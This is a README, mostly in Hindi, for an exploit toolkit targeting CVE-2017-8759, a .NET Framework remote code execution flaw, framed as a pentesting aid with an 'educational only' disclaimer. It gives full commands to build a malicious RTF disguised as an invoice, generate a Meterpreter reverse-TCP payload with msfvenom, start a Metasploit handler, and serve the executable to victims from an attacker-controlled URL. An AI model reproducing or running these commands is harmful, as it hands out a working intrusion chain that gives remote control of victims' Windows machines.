
शोषण टूलकिट CVE-2017-8759 - v1.0 एक सुविधाजनक पायथन स्क्रिप्ट है जो पेंटेस्टर्स और सुरक्षा शोधकर्ताओं को Microsoft .NET Framework RCE का परीक्षण करने का एक त्वरित और प्रभावी तरीका प्रदान करती है। यह एक दुर्भावनापूर्ण RTF फ़ाइल उत्पन्न कर सकती है और बिना किसी जटिल कॉन्फ़िगरेशन के पीड़ित को मेटास्प्लॉइट / मीटरप्रेटर / अन्य पेलोड वितरित कर सकती है।
यह प्रोग्राम केवल शैक्षिक उद्देश्य के लिए है। बिना अनुमति के इसका उपयोग न करें। सामान्य अस्वीकरण लागू होता है, विशेष रूप से यह तथ्य कि मैं (bhdresh) इन कार्यक्रमों द्वारा प्रदान की गई जानकारी या कार्यक्षमता के प्रत्यक्ष या अप्रत्यक्ष उपयोग से होने वाली किसी भी क्षति के लिए उत्तरदायी नहीं हूँ। लेखक या कोई भी इंटरनेट प्रदाता इन कार्यक्रमों या इनके किसी भी व्युत्पन्न की सामग्री या दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेता है। इस कार्यक्रम का उपयोग करके आप इस तथ्य को स्वीकार करते हैं कि इन कार्यक्रमों के उपयोग से होने वाली कोई भी क्षति (डेटा हानि, सिस्टम क्रैश, सिस्टम से समझौता, आदि) bhdresh की जिम्मेदारी नहीं है।
अंत में, यह एक व्यक्तिगत विकास है, कृपया इसके दर्शन का सम्मान करें और इसका उपयोग बुरी चीजों के लिए न करें!
CC BY 4.0 लाइसेंस - https://creativecommons.org/licenses/by/4.0/
स्क्रिप्ट में निम्नलिखित क्षमताएँ पेश की गईं
- दुर्भावनापूर्ण RTF फ़ाइल उत्पन्न करें
- उत्पन्न RTF फ़ाइल के लिए शोषण मोड
संस्करण: पायथन संस्करण 2.7.13
1) Generate malicious RTF file
# python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.txt
2) (Optional, if using MSF Payload) : Generate metasploit payload and start handler
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
# msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
3) Start toolkit in exploit mode to deliver local payload
# python cve-2017-8759_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
# python cve-2017-8759_toolkit.py -h
यह CVE-2017-8759 (Microsoft .NET Framework RCE) का शोषण करने के लिए एक सुविधाजनक टूलकिट है।
मोड:
-M gen केवल दुर्भावनापूर्ण फ़ाइल उत्पन्न करें
दुर्भावनापूर्ण RTF फ़ाइल उत्पन्न करें:
-w <Filename.rtf> दुर्भावनापूर्ण RTF फ़ाइल का नाम (यह फ़ाइल पीड़ित के साथ साझा करें)।
-u <http://attacker.com/test.txt> रिमोट txt फ़ाइल का पथ। सामान्यतः, यह एक डोमेन या IP होना चाहिए जहाँ यह टूल चल रहा है।
उदाहरण के लिए, http://attackerip.com/test.txt (यह URL दुर्भावनापूर्ण RTF फ़ाइल में शामिल किया जाएगा और पीड़ित द्वारा दुर्भावनापूर्ण RTF फ़ाइल खोलने पर अनुरोध किया जाएगा)।
-M exp शोषण मोड प्रारंभ करें
शोषण:
-p <TCP पोर्ट:डिफ़ॉल्ट 80> स्थानीय पोर्ट नंबर।
-e <http://attacker.com/shell.exe> एक निष्पादन योग्य फ़ाइल / मीटरप्रेटर शेल / पेलोड का पथ जिसे लक्ष्य पर निष्पादित करने की आवश्यकता है।
-l </tmp/shell.exe> एक निष्पादन योग्य फ़ाइल / मीटरप्रेटर शेल / पेलोड का स्थानीय पथ निर्दिष्ट करें।
@bhdresh
@Voulnet, @vysec, @bhdresh
स्पष्ट रूप से, मैं एक पूर्णकालिक डेवलपर नहीं हूँ, इसलिए कुछ रुकावटों की उम्मीद करें
कृपया बग और समस्याओं की रिपोर्ट इस लिंक के माध्यम से करें https://github.com/bhdresh/CVE-2017-8759/issues/new